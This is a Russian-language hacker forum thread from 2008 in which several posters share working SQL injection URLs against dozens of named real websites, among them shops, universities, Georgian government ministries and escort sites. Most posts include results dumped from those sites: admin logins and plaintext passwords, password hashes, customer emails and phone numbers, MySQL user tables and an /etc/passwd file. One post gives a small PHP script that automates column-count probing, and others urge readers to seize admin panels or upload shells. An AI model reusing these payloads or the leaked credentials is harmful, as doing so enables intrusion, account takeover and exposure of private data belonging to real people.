Доступ к таблицам есть, просто например users в соседней базе лежит:
http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u1 4145_2.users/*
Правда их там всего три, и те админы со странными хэшами ;)
Сайт: www.haydamaky.com PR=4
Так и не смог найти таблицу в которой хрянится логин и пас к админке...
http://www.haydamaky.com/ua/main.php?id=9999999+union+select+1,2,version(),4,5 ,6,7,8,9/*
Вот таблицы
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
albom_new
albom_new_comments
buttons
concert_en
guest
info
news
poster
songs
Админка
http://www.haydamaky.com/admin/
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?
http://www.devmaster.net/articles.php?catID=6+union+select+1,user()/*
version() - 5.0.45
database() - Dia_Kharrat_dm_main
user() - dia@localhost
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CJ_UsersOnline
dm_article
dm_category
dm_cotd
dm_eng_rating
dm_eng_search_results
dm_engfeatures
dm_engines
dm_engines_changes
dm_englicenses
dm_features
dm_iotd
dm_news
dm_news_old
dm_section
dm_xotd
dm_xotd_category
ibf_admin_logs_old
ibf_admin_sessions_old
ibf_announcements_old
ibf_attachments_old
ibf_attachments_type_old
ibf_badwords_old
ibf_banfilters_old
ibf_bulk_mail_old
ibf_cache_store_old
ibf_calendar_events_old
ibf_conf_settings_old
ibf_conf_settings_titles_old
ibf_contacts_old
ibf_custom_bbcode_old
ibf_email_logs_old
ibf_emoticons_old
ibf_faq_old
ibf_forum_perms_old
ibf_forum_tracker_old
ibf_forums_old
ibf_groups_old
ibf_languages_old
ibf_mail_error_logs_old
ibf_mail_queue_old
ibf_member_extra_old
ibf_members_converge_old
ibf_members_old
ibf_message_text_old
ibf_message_topics_old
ibf_moderator_logs_old
ibf_moderators_old
ibf_pfields_content_old
ibf_pfields_data_old
ibf_polls_old
ibf_posts_old
ibf_reg_antispam_old
ibf_search_results_old
ibf_sessions_old
ibf_skin_macro_old
ibf_skin_sets_old
ibf_skin_templates_cache_old
ibf_skin_templates_old
ibf_spider_logs_old
ibf_stats_old
ibf_subscription_currency_old
ibf_subscription_extra_old
ibf_subscription_logs_old
ibf_subscription_methods_old
ibf_subscription_trans_old
ibf_subscriptions_old
ibf_task_logs_old
ibf_task_manager_old
ibf_titles_old
ibf_topic_mmod_old
ibf_topics_old
ibf_topics_read_old
ibf_tracker_old
ibf_upgrade_history_old
ibf_validating_old
ibf_voters_old
ibf_warn_logs_old
mk_archive
mk_blobs
mk_brokenlinks
mk_categorylinks
mk_cur
mk_hitcounter
mk_image
mk_imagelinks
mk_interwiki
mk_ipblocks
mk_links
mk_linkscc
mk_logging
mk_math
mk_objectcache
mk_old
mk_oldimage
mk_querycache
mk_recentchanges
mk_searchindex
mk_site_stats
mk_user
mk_user_newtalk
mk_user_rights
mk_validate
mk_watchlist
phpads_acls
phpads_acls_channel
phpads_ad_category_assoc
phpads_ad_zone_assoc
phpads_affiliates
phpads_affiliates_extra
phpads_agency
phpads_application_variable
phpads_banners
phpads_campaigns
phpads_campaigns_trackers
phpads_category
phpads_channel
phpads_clients
phpads_data_intermediate_ad
phpads_data_intermediate_ad_connection
phpads_data_intermediate_ad_variable_value
phpads_data_raw_ad_click
phpads_data_raw_ad_impression
phpads_data_raw_ad_request
phpads_data_raw_tracker_click
phpads_data_raw_tracker_impression
phpads_data_raw_tracker_variable_value
phpads_data_summary_ad_hourly
phpads_data_summary_ad_zone_assoc
phpads_data_summary_channel_daily
phpads_data_summary_zone_country_daily
phpads_data_summary_zone_country_forecast
phpads_data_summary_zone_country_monthly
phpads_data_summary_zone_domain_page_daily
phpads_data_summary_zone_domain_page_forecast
phpads_data_summary_zone_domain_page_monthly
phpads_data_summary_zone_impression_history
phpads_data_summary_zone_site_keyword_daily
phpads_data_summary_zone_site_keyword_forecast
phpads_data_summary_zone_site_keyword_monthly
phpads_data_summary_zone_source_daily
phpads_data_summary_zone_source_forecast
phpads_data_summary_zone_source_monthly
phpads_database_action
phpads_images
phpads_lb_local
phpads_log_maintenance_forecasting
phpads_log_maintenance_priority
phpads_log_maintenance_statistics
phpads_password_recovery
phpads_placement_zone_assoc
phpads_plugins_channel_delivery_assoc
phpads_plugins_channel_delivery_domains
phpads_plugins_channel_delivery_rules
================================================== ==================
mk_user :
user_id
user_name
user_real_name
user_password
user_newpassword
user_email
user_options
user_touched
user_token
result:
Reedbeta:fd50302fd2f3ef8f527465251903e4fa
Dia Kharrat:5a69a0668268a34d04333c77d2970949
Anubis:75352e3845c8c6a61e52893ce8b178b0
Baldurk:8d761c44f8e4daef212ab80bb8875a6c
Bladder:86c97024c1cb01ebdd09b4feeffdfa44
http://favicon.yandex.net/favicon/openit.com.ua/ openit.com.ua
Кста, там чувак есть с античата - inlanger
пароль подходит тока на мыло :D
http://openit.com.ua/reportage.php?id=109+union+select+1,2,3,4,5,6,7,8, 9--&LCovId=&mon=6&year=2008&lang=ua
Database Version: 5.0.22-log
Database name: smat6_openit
User name: smat@localhost
Юзеры ;)
http://openit.com.ua/reportage.php?id=109+union+select+1,2,3,concat_ws( 0x203a20,id,login,password,real_name,firstname,cit y,mail),5,6,7,8,9+from+users--&LCovId=&mon=6&year=2008&lang=ua
Проверил robots.txt
User-Agent: *
Allow: /
Disallow: /admin
блин, на бейсике...
пароль из мускуль: admin : admin_admin
кто найдет пасс к админке, стукните плз.. или пм :)
prescott
30.07.2008, 23:53
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?
ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской
<?php
for ($i=100; $i<108; $i++) {
echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+";
for ($j=1; $j<=$i; $j++) {
echo $j;
if ($j!=$i) echo ",";
};
echo "/*'>$i</a><br>";
}
?>
Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа:
SELECT * FROM EVENT LEFT JOIN REGION ON
(E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE
ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN
BUNDESLAND ON
(E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE
E_ID=99999999
107!!! полей выборки, из которых нужны макс 20, бедный сервак. :eek:
Ну и как результат
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,user(),database() ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62,63,version(),user,pas sword,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,9 8,99,100,101,102,103,104,105,106,107+from+mysql.us er/*
Даже не закрыт доступ к db mysql...
prescott
31.07.2008, 00:58
mmogame.ru
70к+ валидных мэйликов пользуйтесь =):
http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,LOAD_FILE(0x4579),5,6,7,email +from+mmo_users+limit+0,1000%20--%20&cat=1 Хэши паролей соленые((
http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,username,5,6,7,password+from+ test_promoreklama.users+limit+0,1000%20--%20&cat=1 От базы проморекламы, хэши не соленые, на счету модера 130к+ деревянных, но у него пасс сцуко не шифруется - поэтому скул в паблик, кто откроет может поделится)...
4sexshop.ru
Упал только что, а так вот хэш пароля админа
http://www.4sexshop.ru/shop/goods/%20188999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,c oncat(0x3c2f7469746c653e3c68313e,%20%20pass,0x3c2f 68313e),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9+from+user.htm
Админка: admin : ok (нубярко=)
В админке можете поискать своего озабоченного друга, все данные о клиентах там есть вплоть до прописки :)
Доступ к таблицам есть, просто например users в соседней базе лежит:
http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u1 4145_2.users/*
Правда их там всего три, и те админы со странными хэшами ;)
Это не странные хеши) это MD5(Unix) вроде)
вот и сами хэши
lenar@tonez.net.ru : $1$LenAr$0GbWVUnw3liEE4HT4Gskm0
admin@tonez.net.ru : $1$LenAr$vpSwW7oIhLIYn6n5eLL2W.
music@tonez.net.ru : $1$LenAr$QGD8EMTZSpBkR72abB8Ak.
Paraavis.com - PR 4
http://www.paraavis.com/index1.php?id=259+union+select+1,2,table_name,4,5, 6+from+information_schema.tables/*&secid=368&mainid=255
5 версия, смотрим таблы..
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, username,user_password,user_id),4,5,6+from+phpbb_u sers+where+user_level=1/*&secid=368&mainid=255
увидев phpbb я сразу кинулся заливать шелл... но тут неудача.... аватарка не загружается и востановления бд не рабоатет......
planer;patagonia
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, members_l_username,member_login_key),4,5,6+from+pa raavis.ibf_members/*&secid=368&mainid=255
дальше.. я увидел таблы с IPB но сам форум так и не нашел...
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, converge_email,converge_pass_hash,converge_pass_sa lt),4,5,6+from+paraavis.ibf_members_converge/*&secid=368&mainid=255
пасс и соль поидее....
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, email,pwd),4,5,6+from+paraavis.avgdusers/*&secid=368&mainid=255
какието юзеры..
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, nick,password,email),4,5,6+from+paraavis.users_01/*&secid=368&mainid=255
еще юзеры..
Newprint.ru
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('views'))--
нелюблю я мелких...... но приходится)
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+COLUMN_NAM E+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME ='db_Admin'+and+column_name+NOT+IN+('isAdmin','Las tLogin','Login','Password'))--
вот нужная там табла.. и колонка к ней...
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+Login+from +db_Admin)--
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+Password+f rom+db_Admin)--
админка (http://forum.antichat.ru/showpost.php?p=793941&postcount=539)
www.scrapbookingmemories.com.au
user(): express_db1@web1.expresspublications.com.au
version(): 4.1.20
database(): showcase_sbm
file_priv = Y но права поставлены так что не читаются файлы пользователей :)
/etc/passwd читается, если верить /etc/redhat-release то система Red Hat Enterprise Linux ES release 4 (Nahant Update 5)
http://www.scrapbookingmemories.com.au/scraproom/index.php?content=album&user=24377777777777+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,concat_ws(0x3a,username,password,email), 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31/**/from/**/users/**/limit/**/2,1/*&coll=1003
count from users = 2874
пароли в чистом виде
доп. инфо:
/home/scrap/public_html/scraproom/global_includes/select.php
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
phpmyadmin:x:500:500::/home/phpmyadmin:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Newprint.ru
boss;mura - кто нашел админку отзовитесь..)
Сервер там Microsoft-IIS/6.0 стоит.
Лови админку:
http://www.newprint.ru/_admin/
Только чот она грузится долго( У меня такое чувство, то они специально "зашифровались" :-D ... По моему еще какой-то файлик идет после /_admin/ ... .
Но путь админки - 100% :)
prescott
31.07.2008, 16:25
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+fr om+us/*&sale=3&order=
Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(
Для тех у кого уже руки трясутся =)
http://putana.nu
http://putana.nu/list.php?link=-30545+union+select+1,concat(login,char(58),pass),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43+from+users+limit+1,1/*
Login: rdvi02
Pass: 247580
http://sexrobot.ru
http://sexrobot.ru/list.php?link=711+union+select+1,concat(login,char (58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
[B]http://pentboy.ru
http://pentboy.ru/list.php?link=34637+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://robosex.ru
http://robosex.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://magdalina.ru
http://magdalina.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://dosugspb.ru
http://dosugspb.ru/list.php?link=37849+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://sexmodeli.org
http://sexmodeli.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://sexmodeli.net
http://sexmodeli.net/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://sexmodeli.ru
http://sexmodeli.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://intimuslugi.org
http://intimuslugi.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://intimuslugi.net
http://intimuslugi.net/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://magdalina.org
http://magdalina.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://intimdosug.org
http://intimdosug.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://mskputana.ru
http://mskputana.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://spbputana.ru
http://spbputana.ru/list.php?link=37849+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://dosugmsk.ru
http://dosugmsk.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+fr om+us/*&sale=3&order=
Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(
админка
http://www.remeco.ru/login.php
но не работает
все таблицы
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,table_name, 3,4+from+information_schema.tables/**/limit/**/16,99999/*&sale=3&order=
манагеры
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0 x3a,name,login,pwd,mail),3,4+from+manager/*&sale=3&order=
пользователи из user1
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0 x3a,id,name,mail,inn,passwd,score,status),3,4+from +user1/*&sale=3&order=
WarLib.ru - PR 5
http://top.warlib.ru/rate.php?site=-1182421676+union+select+version(),2/*
PicHost.ru
http://www.pichost.ru/?showlinks=1&viewmode=0&gallery_id=999999999'+union+select+1,unhex(hex(tab le_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+fr om+information_schema.tables/*
5 ветка..
http://www.pichost.ru/?showlinks=1&viewmode=0&gallery_id=99999999'+union+select+1,concat_ws(0x3a ,user,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+ from+users/*
юзеры.. но с выводом туповато.. (
http://favicon.yandex.net/favicon/expert.com.ua/ expert.com.ua (193.178.145.3)
Яндекс тИЦ 1200 (http://search.yaca.yandex.ru/yca/cy/ch/expert.com.ua)
Path: /var/www/expert/expert.com.ua/index.php
Database Version: 4.1.22-log
Database name: expert
User name: u_expert@localhost
http://expert.com.ua/index.php?option=news&id=361'+UNION+SELECT+1,concat_ws(0x203a20,database (),user()),3,version(),5,6/*6&dir=2
Привилегии файл запрещены (
ItLab.unn.ru - PR 5
Нижегородский государственный университет им.Н.И.Лобачевского.
ЛАБОРАТОРИЯ ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ .
Факультет вычислительной математики и кибернетики.
http://itlab.unn.ru/?dir=999999+union+select+1,2,table_name+from+infor mation_schema.tables/*
5 ветка и таблы..
http://itlab.unn.ru/?dir=9999999999+union+select+1,2,unhex(hex(concat_ ws(0x3a,id,login,passwd,email)))+from+us_users/*
админка (http://forum.antichat.ru/showpost.php?p=793941&postcount=539)
http://itlab.unn.ru/?dir=9999999999+union+select+1,2,unhex(hex(concat_ ws(0x3a,id,login,passwd,email)))+from+compiler.us_ users/*
юзеры из другой базы..
http://itlab.unn.ru/?dir=9999999999+union+select+1,2,unhex(hex(concat_ ws(0x3a,id,login,passwd,email)))+from+telma.us_use rs+limit+7,1/*
другие юзеры..
Software.unn.ac.ru
http://www.software.unn.ac.ru/?dir=99999999+union+select+1,2,concat_ws(0x3a,logi n,passwd)+from+mo_evm.us_users/*
software.unn.ac.ru/manager/
также сдесь: Unn.ru - PR 6
http://unn.ru/graduates/?main=graduates&sub=registration
при регистрации можно залить шелл... токо исполнение не полное.. можно чтот придумать..
www.effective.net.ua
Яндекс тИЦ - 30 (http://search.yaca.yandex.ru/yca/cy/ch/effective.net.ua)
version() = 4.0.27-log
database() = effectiv_effe
user() = effectiv_effe@localhost
http://www.effective.net.ua/lots.php?t=4&t2=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( char(32,58,32),version(),user(),database()),30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50+from+users/*
http://m2.com.ua
3 ветка
http://m2.com.ua/article_list.php?id=77+and+3=substring(version(),1 ,1)/*&PHPSESSID=959d18e46fbe55006f5cb3c40f4e6f25
http://www.kiis.com.ua
version() = 5.0.37-log
user() = kiis@sleipnir.carrier.kiev.ua
database() = kiis
http://www.kiis.com.ua/?id=2&sp=1+union+select+1,2,3,4,concat_ws(char(32,58,32) ,version(),user(),database()),6,7,8,9/*
Teatrdoc.ru - PR 5
Театр.DOC
http://www.teatrdoc.ru/plays.php?id=-1+union+select+1,2,version(),4,5/*
Novochgrad.ru - PR 3
Новочеркасск. Администрация Города.
http://www.novochgrad.ru/adm.php?id=-28+union+select+1,version(),3/*
www.naec.ge
Examination Center provides Georgian
http://www.naec.ge/more.php?t=links.php&f=20&su=semassessmentland&rig_no=1&id=-86'+union+select+1,2,3,4,5,6,7,8,concat(username,c har(58),passwd),10,11+from+user+limit+0,1/*&lang=eng
xarebava:naecge
Login: xarebava
Pass: naecge
http://www.mes.gov.ge/
Ministry of education and science of Georgia
http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,id,user,pass,7+from+gov_pas sword/*
http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,concat(table_name,char(58), column_name,char(58),table_schema),5,6,7+from+info rmation_schema.columns/*
Login:mesarion
Pass: yvancha
http://www.sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/*
нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет
Dr.Frank
01.08.2008, 18:46
dit.gov.bt - Pr5
http://www.dit.gov.bt/newsdetail.php?newsId=-44+union+select+11,22,concat(0x2020202020202020202 020,user,0x3a,password),44+from+mysql.user--
ILYAtirtir
01.08.2008, 19:16
http://vehaauto.ru/catalog.php?id_article=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*&id_page=1
4.0.27-max-log
http://www.cccp.de/humor/showitem.php?id=4+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5/*
4.0.15:web2@localhost:usr_web2_1
http://www.generalsemantics.org/inner.php?page=news&id=999999+union+select+1,2,version(),4/*
5.0.22
http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,table_name+from+information_s chema.tables/*
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
tbl_adminusers
tbl_featured_products
tbl_mainpages
tbl_masterpages
tbl_news
tbl_quotes
tbl_subpages
http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,Login Name,PassWord,email,phoneNo)+from+tbl_adminusers/*
Lance Strate:lstrate:heroes:lstrate@time-binding.org:201-921-4745
Marty Levinson:Marty:Fairytales:igs@timebinding.org:718-793-6621
nmtucson:nmtucson:justme:millerstwo@comcast.net:52 0-225-0476
Jennifer Clarke:jennifer:56375637:igs@time-binding.org:817-922-9950
Login Page http://www.generalsemantics.org/admin/login.php
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws( 0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23
5.0.51a:admin@localhost
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,table_name ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23+from+information_schema.tables+limit+19,1
table_name=aut
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,column_nam e,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23+from+information_schema.columns+where+table_ name=0x617574+limit+1,1
columns_name=log,pass
http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws( 0x3a,log,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+aut+limit+0,1
lisa:lisa
dima:dima
база юзеров:
username
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,username,null,null,n ull,null,null,null,null,null,null,null+from+users+ where+1=1/*
password
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,password,null,null,n ull,null,null,null,null,null,null,null+from+users+ where+1=1/*
мыла
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,email,null,null,null ,null,null,null,null,null,null,null+from+users+whe re+1=1/*
таблицы
http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,column_name,null,nul l,null,null,null,null,null,null,null,null+from+inf ormation_schema.columns/*
подскажите как в данном слуаче найти вдминку? также не получилось узнать version() и database()
---------------
сорри тупанул
version() - 5.0.32-Debian_7etch5-log
database() - borodinmokaru
админку все еще не нашел
Dr.Frank
01.08.2008, 19:30
worldrowing.com - Pr7
http://www.worldrowing.com/display/modules/media/media_detail.php?mediacenterid=-8+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass word),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25+from+mysql.user+limit+0,1--&imgnum=13&mdatype=1&searchKwd=&searchFrom=&searchTo=&cat=&subcat=209&subcat2=&page=0
http://www.enterthevault.com/artist.php?id=-43+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,us er(),database(),version()),44,45,46,47/*
version() - 4.1.20-LOG
user() - VAULT@LOCALHOST
database() - VAULT
http://www.sportsouthwest.co.uk/other.php?id=-167+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5/*
version() - 4.1.20-log
user() - sportsouthuk@localhost
database() - sportsouthuk
http://www.roguegovernment.com/news.php?id=-4682+union+select+concat_ws(0x3a,user(),database() ,version()),2,3,4,5,6
version() - 4.1.22-standard
user() - roguegov_publicr@localhost
database() - roguegov_rgov
emspost.ru
VERSION() 4.1.22-log
DATABASE() emspost_1
USER() emspost_1@localhost
Версия 4, такчто всё подобрано руками :cool:
Сразу под парсер, разбивать по :::
http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0 x3a3a3a,id,name,company,email,city,address,phone,l ogin,pwd),0x3a3a3a),6,7,8,9+FROM+ems_clients+LIMIT +0,1/*
